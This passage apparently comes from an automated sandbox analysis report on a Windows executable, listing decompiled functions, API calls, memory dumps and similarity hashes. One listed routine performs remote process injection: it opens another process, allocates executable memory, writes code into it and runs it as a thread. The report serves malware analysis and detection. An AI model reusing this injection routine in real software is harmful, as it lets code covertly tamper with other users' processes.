							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                                                    0x004056b5
                                                                                                                    0x004056c3
                                                                                                                    0x004056c5
                                                                                                                    0x004056cc
                                                                                                                    0x004056cf
                                                                                                                    0x004056d2
                                                                                                                    0x004056d5
                                                                                                                    0x004056dc
                                                                                                                    0x004056df
                                                                                                                    0x004056e2
                                                                                                                    0x004056e5
                                                                                                                    0x004056e8
                                                                                                                    0x004056ef
                                                                                                                    0x004056f2
                                                                                                                    0x004056f7
                                                                                                                    0x004056fd
                                                                                                                    0x00405832
                                                                                                                    0x00405832
                                                                                                                    0x00405835
                                                                                                                    0x00405835
                                                                                                                    0x00405838
                                                                                                                    0x0040583e
                                                                                                                    0x00405849
                                                                                                                    0x00405849
                                                                                                                    0x00405703
                                                                                                                    0x00405706
                                                                                                                    0x00405709
                                                                                                                    0x00405710
                                                                                                                    0x0040575b
                                                                                                                    0x00405766
                                                                                                                    0x0040577b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040577d
                                                                                                                    0x00000000
                                                                                                                    0x0040577d
                                                                                                                    0x0040576b
                                                                                                                    0x0040576e
                                                                                                                    0x00000000
                                                                                                                    0x00405783
                                                                                                                    0x00405783
                                                                                                                    0x00405785
                                                                                                                    0x004057d1
                                                                                                                    0x004057dc
                                                                                                                    0x004057e4
                                                                                                                    0x004057e8
                                                                                                                    0x004057eb
                                                                                                                    0x004057ec
                                                                                                                    0x004057ef
                                                                                                                    0x004057ef
                                                                                                                    0x00000000
                                                                                                                    0x004057ef
                                                                                                                    0x0040578b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405790
                                                                                                                    0x00405796
                                                                                                                    0x00405798
                                                                                                                    0x0040579e
                                                                                                                    0x004057a1
                                                                                                                    0x004057b4
                                                                                                                    0x004057a3
                                                                                                                    0x004057a5
                                                                                                                    0x004057a5
                                                                                                                    0x004057ba
                                                                                                                    0x004057c1
                                                                                                                    0x004057c3
                                                                                                                    0x004057c3
                                                                                                                    0x004057c8
                                                                                                                    0x004057cb
                                                                                                                    0x004057cb
                                                                                                                    0x004057ce
                                                                                                                    0x00000000
                                                                                                                    0x004057ce
                                                                                                                    0x00405717
                                                                                                                    0x0040571a
                                                                                                                    0x00405725
                                                                                                                    0x0040572a
                                                                                                                    0x0040572f
                                                                                                                    0x00405733
                                                                                                                    0x00405735
                                                                                                                    0x00405735
                                                                                                                    0x0040573e
                                                                                                                    0x00405743
                                                                                                                    0x00405746
                                                                                                                    0x0040574d
                                                                                                                    0x00405750
                                                                                                                    0x00405750
                                                                                                                    0x0040571a
                                                                                                                    0x004057f2
                                                                                                                    0x004057f2
                                                                                                                    0x004057f8
                                                                                                                    0x004057fe
                                                                                                                    0x004057fe
                                                                                                                    0x00405809
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405810
                                                                                                                    0x00405815
                                                                                                                    0x0040581a
                                                                                                                    0x0040581e
                                                                                                                    0x00405820
                                                                                                                    0x00405820
                                                                                                                    0x00405825
                                                                                                                    0x0040582b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                      • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                      • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                    • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID: "
                                                                                                                    • API String ID: 1294909896-123907689
                                                                                                                    • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                    • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                    • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                    • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                    0x004054bc
                                                                                                                    0x004054c4
                                                                                                                    0x004054cd
                                                                                                                    0x004054cf
                                                                                                                    0x004054d2
                                                                                                                    0x004054d5
                                                                                                                    0x004054d8
                                                                                                                    0x004054db
                                                                                                                    0x004054de

                                                                                                                    APIs
                                                                                                                    • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                    • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                    • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                    • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                    • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                    0x00408f4c
                                                                                                                    0x00408f57
                                                                                                                    0x00408f60
                                                                                                                    0x00408f62
                                                                                                                    0x00408f67
                                                                                                                    0x00408f67
                                                                                                                    0x00408f71

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                      • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 187924719-0
                                                                                                                    • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                    • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                    • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                    • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                    0x004098fa
                                                                                                                    0x004098fc
                                                                                                                    0x00409901
                                                                                                                    0x00409907
                                                                                                                    0x00000000
                                                                                                                    0x0040991c
                                                                                                                    0x00409918
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859505661-0
                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                    0x004095da
                                                                                                                    0x004095da
                                                                                                                    0x004095de
                                                                                                                    0x004095e1
                                                                                                                    0x004095e7
                                                                                                                    0x004095e7
                                                                                                                    0x004095ee
                                                                                                                    0x004095fc

                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                    • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                    • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                    • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                    0x0040a3d0
                                                                                                                    0x0040a3d9

                                                                                                                    APIs
                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumNamesResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3334572018-0
                                                                                                                    • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                    • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                    • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                    • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                                    0x004055d1
                                                                                                                    0x004055d1
                                                                                                                    0x004055d5
                                                                                                                    0x004055da
                                                                                                                    0x004055df
                                                                                                                    0x004055e3
                                                                                                                    0x004055e4
                                                                                                                    0x004055e8
                                                                                                                    0x004055eb

                                                                                                                    APIs
                                                                                                                    • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                    • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                    • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                    • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                    0x0040a474
                                                                                                                    0x0040a47b
                                                                                                                    0x0040a48a
                                                                                                                    0x0040a48d
                                                                                                                    0x0040a48f
                                                                                                                    0x0040a497
                                                                                                                    0x0040a49a
                                                                                                                    0x0040a6f7
                                                                                                                    0x0040a6f9
                                                                                                                    0x0040a700
                                                                                                                    0x0040a700
                                                                                                                    0x0040a4ad
                                                                                                                    0x0040a4b3
                                                                                                                    0x0040a4b8
                                                                                                                    0x0040a4c6
                                                                                                                    0x0040a4cc
                                                                                                                    0x0040a4cf
                                                                                                                    0x0040a4dd
                                                                                                                    0x0040a4e2
                                                                                                                    0x0040a4e3
                                                                                                                    0x0040a4ea
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4ec
                                                                                                                    0x0040a4f6
                                                                                                                    0x0040a4fe
                                                                                                                    0x0040a503
                                                                                                                    0x0040a504
                                                                                                                    0x0040a50b
                                                                                                                    0x0040a506
                                                                                                                    0x0040a506
                                                                                                                    0x0040a506
                                                                                                                    0x0040a50d
                                                                                                                    0x0040a512
                                                                                                                    0x0040a518
                                                                                                                    0x0040a51c
                                                                                                                    0x0040a523
                                                                                                                    0x0040a523
                                                                                                                    0x0040a523
                                                                                                                    0x0040a528
                                                                                                                    0x0040a537
                                                                                                                    0x0040a54c
                                                                                                                    0x0040a539
                                                                                                                    0x0040a544
                                                                                                                    0x0040a549
                                                                                                                    0x0040a558
                                                                                                                    0x0040a56d
                                                                                                                    0x0040a55a
                                                                                                                    0x0040a565
                                                                                                                    0x0040a56a
                                                                                                                    0x0040a579
                                                                                                                    0x0040a591
                                                                                                                    0x0040a57b
                                                                                                                    0x0040a589
                                                                                                                    0x0040a58e
                                                                                                                    0x0040a5b4
                                                                                                                    0x0040a5b7
                                                                                                                    0x0040a5cc
                                                                                                                    0x0040a5cf
                                                                                                                    0x0040a5d4
                                                                                                                    0x0040a5d7
                                                                                                                    0x0040a6ed
                                                                                                                    0x0040a5e5
                                                                                                                    0x0040a5fa
                                                                                                                    0x0040a60b
                                                                                                                    0x0040a61a
                                                                                                                    0x0040a620
                                                                                                                    0x0040a623
                                                                                                                    0x0040a62b
                                                                                                                    0x0040a62f
                                                                                                                    0x0040a632
                                                                                                                    0x0040a659
                                                                                                                    0x0040a634
                                                                                                                    0x0040a635
                                                                                                                    0x0040a641
                                                                                                                    0x0040a648
                                                                                                                    0x0040a648
                                                                                                                    0x0040a668
                                                                                                                    0x0040a66e
                                                                                                                    0x0040a685
                                                                                                                    0x0040a69e
                                                                                                                    0x0040a6a8
                                                                                                                    0x0040a6ad
                                                                                                                    0x0040a6bd
                                                                                                                    0x0040a6c5
                                                                                                                    0x0040a6c8
                                                                                                                    0x0040a6d0
                                                                                                                    0x0040a6d1
                                                                                                                    0x0040a6d2
                                                                                                                    0x0040a6d3
                                                                                                                    0x0040a6d3
                                                                                                                    0x0040a6c8
                                                                                                                    0x0040a6d7
                                                                                                                    0x0040a6dc
                                                                                                                    0x0040a6dc
                                                                                                                    0x0040a6d7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                    • memset.MSVCRT ref: 0040A4B3
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                      • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                      • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                      • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                      • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                      • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                      • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                    • memset.MSVCRT ref: 0040A66E
                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                    • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                    • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                    • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                    • API String ID: 1572607441-20550370
                                                                                                                    • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                    • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                    • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
